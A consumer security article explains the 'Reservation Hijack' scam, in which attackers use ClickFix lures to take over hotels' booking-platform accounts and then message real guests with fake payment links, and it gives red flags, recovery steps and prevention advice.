Reservation Hijack: Your Real Hotel Booking Is the Trap

Reservation Hijack: Your Real Hotel Booking Is the Trap

It's 8:47am. Nine days until your trip to the Oregon coast — flights booked, hotel confirmed, dog sitter lined up. You check your email over coffee and there's a new message from Booking.com: your name, your reservation number, the exact hotel, exact dates, exact room type. Everything checks out.

The message says there was a problem processing your credit card. Please re-verify your payment details within 24 hours or your reservation will be released.

Stop. Don't click that link.

That message — with every accurate detail about your actual, legitimate booking — may have come from a scammer who compromised your hotel's account. Security researchers at Gen Digital (the company behind Norton) published findings in May 2026 identifying this as the Reservation Hijack scam. They found more than 350 compromised hotels and accommodations across 50 countries, and estimated that these compromised properties see roughly 6 million guest stays per year — all of those guests potentially in range of a targeted message that knows exactly when and where they're traveling.

This isn't a fake listing. You booked this hotel. It's real. The scammer just got in the middle.

How the Reservation Hijack Scam Actually Works

Most hotel scams work from scratch — fake listings, fabricated reviews, invented hosts. The reservation hijack is different because it starts with real access.

Here's the chain:

Someone on the hotel staff gets hit first. A hotel employee receives an email about a "guest complaint" or an "urgent reservation issue." It links to a page with what looks like a standard CAPTCHA: "Press Win+R, paste this command, and press Enter to verify you're not a robot."

That's not a real CAPTCHA. That's a technique called ClickFix, and the "command" installs malware. From the moment the employee pastes it and presses Enter, the attacker has the hotel's booking platform login credentials and access to the front office computer.

Microsoft tracks the group behind many of these attacks as Storm-1865, a financially motivated operation active since early 2023.

The attacker logs into the hotel's booking platform account. They can see every active reservation: every guest's name, email, travel dates, room type, and booking reference.

They message real guests through the real platform. Booking.com and similar platforms have a messaging system hotels use for check-in instructions and updates. The attacker uses that same system — the one you already trust — to send fake urgent payment alerts. Your real details, real channel, fake destination.

The payment page takes your card. The link goes to a fake page that mirrors the hotel or booking platform's design. It validates your card number in real time. Then your payment information goes straight to the attacker.

The scam works because there's almost nothing to trigger suspicion. The hotel is real. The message came through the right channel. Your booking details are accurate because the attacker pulled them from your actual reservation. The only fake thing is where the link goes.

Why This Is Harder to Spot Than a Fake Listing

Most scam advice is some version of "if something feels off, it probably is." Fake listings usually do feel off — the price is suspiciously low, the host is weirdly eager to move payment outside the platform, the photos look borrowed from somewhere else.

The reservation hijack has none of those tells.

You made this booking. The message is about your trip. The details all check out because they were pulled from your actual reservation. The emotional state you're in when you read it is completely different from a cold phishing email: you're not on guard, you're thinking about Oregon.

That's not naïveté. That's the scam doing exactly what it's designed to do.

The red flags exist — they're just quieter.

The Red Flags Hiding in Plain Sight

The URL doesn't match the platform. Legitimate payment requests for existing reservations keep you on the platform's domain. The fake page will use something adjacent: booking-secure-verify.com, reservations-payment-update.net, or a misspelled version of the hotel's name. Look at the full URL before you type anything. Every time.

They're asking for card info you already gave. You entered payment details when you made the reservation. Real hotels don't need them again via an email link. Legitimate payment issues on booking platforms are resolved through the platform — not by redirecting you to a third-party page.

The urgency is artificial. "24 hours or your reservation is released." Scammers manufacture pressure to short-circuit your judgment. Real hotels don't issue 24-hour ultimatums for payment re-entry.

The message is sending you off-platform. If a Booking.com message links somewhere that isn't booking.com, slow down. That's not how the platform works.

The message doesn't appear in the app thread. Open the booking platform's app and find the message thread with your property. If the "urgent" alert is only in your email and not visible in the platform's messaging thread, something is wrong.

The checkout page has a weird "CAPTCHA." If a payment verification page asks you to run a command or paste something into your computer, exit immediately. That's ClickFix — the same technique used to compromise the hotel staff, now being run on guests.

Nobody at the hotel knows what you're talking about. Call the hotel directly using the phone number from their official website — not any number from the suspicious message. Ask whether there's a payment issue with your reservation. There won't be.

If This Already Happened to You

First: you didn't do something careless. You received a message with your correct booking information through a channel you had every reason to trust. The scam was designed to be convincing. That's on the scammers, not you.

Here's what to do now:

Call your bank immediately. Report the charge as fraud and ask them to cancel the card and issue a new number. The faster you call, the better your chances of a successful chargeback. Most major card issuers have 24/7 fraud lines.

Change your passwords. If the fake page asked you to log in anywhere, treat those credentials as compromised. Change them everywhere — especially if you reuse passwords.

Report it to the booking platform. Booking.com and similar platforms want to know when partner hotel accounts are compromised. A report helps them investigate the affected property and warn other guests.

File a report with the FTC. Go to reportfraud.ftc.gov. Five minutes. Imposter scam losses hit $3.5 billion in 2025 according to the FTC — these reports actually drive enforcement action.

Watch your other accounts. If you entered an email address and password on the fake page, assume those credentials are exposed and change them.

How to Not Become the Next Victim

You can't control whether your hotel's IT department has good security habits. You can control what happens when a payment request lands in your inbox.

Treat all unexpected payment requests with suspicion, even when the details look right. Correct details are no longer proof of legitimacy. The whole point of this scam is that the details are correct.

Verify through the platform directly. When a payment alert arrives, open a new browser tab, type the booking platform's URL yourself, and check your reservation status there. Don't click the link in the message.

Use a credit card for travel bookings, not a debit card. Credit cards have chargeback protections. Debit cards draw directly from your bank account, and recovery is significantly harder.

Enable two-factor authentication on your travel accounts. Booking platforms support it. It won't block every attack vector, but it raises the bar.

For a broader look at the travel scams currently circulating — fake listings, bogus airline deals, parking QR codes — this post covers the full summer landscape. If you want to know how to evaluate a suspicious email before clicking anything, here's how to tell if an email is phishing. And when a payment page looks plausible but something feels slightly off, this is how to check if a website is actually legitimate.

Frequently Asked Questions

What is the reservation hijack scam?

Attackers compromise a real hotel's account on a booking platform like Booking.com, then use that access to contact real guests with fake payment requests. Because the messages contain accurate booking details and arrive through the legitimate platform's messaging channel, they're convincing in a way most scam emails aren't. The link leads to a fake payment page designed to steal card information.

How do I know if a payment request from my hotel is actually real?

Go directly to the booking platform by typing the URL yourself — don't click the link in the message — and check whether a payment issue shows up in your reservation. Or call the hotel using the number from their official website. Legitimate platforms don't redirect you to a third-party site to re-enter payment details you already provided.

I already entered my card number. What do I do now?

Call your bank immediately and report it as fraud. Ask them to cancel the card and issue a new number. Report the incident to the booking platform, and file a fraud report at reportfraud.ftc.gov.

Is Booking.com safe to use?

Booking.com is a legitimate platform. The reservation hijack scam doesn't exploit a vulnerability in Booking.com itself — it exploits compromised hotel partner credentials. The platform isn't the weak link; individual hotels' security practices are. Verify unexpected payment requests through a separate channel before entering any information.

What is a ClickFix attack?

ClickFix is a social engineering technique where attackers present targets with a fake "verify you're not a robot" prompt that actually instructs them to run a malicious command on their computer. Hotel staff are targeted with fake "urgent guest complaint" emails that use this technique to steal booking platform credentials. The same technique has also been spotted on fake payment pages targeting guests directly.

How widespread is this scam right now?

Security researchers at Gen Digital identified more than 350 compromised hotel and accommodation properties across 50 countries as of May 2026, with the U.S., Germany, France, the UK, Italy, and Spain among the most affected. They estimate roughly 6 million guest stays per year fall within range of follow-up messages using real booking details.

---

Scammers got better at this. Knowing they have your real details isn't a reason to trust a message — it's a reason to slow down before you click anything.

Sources: Gen Digital, "The Reservation Hijack Scam," May 2026; Gen Digital, "350 Hotels Compromised Across 50 Countries"; Norton Summer Scam Forecast, June 5, 2026; FTC, "New trends in reports of imposter scams," May 2026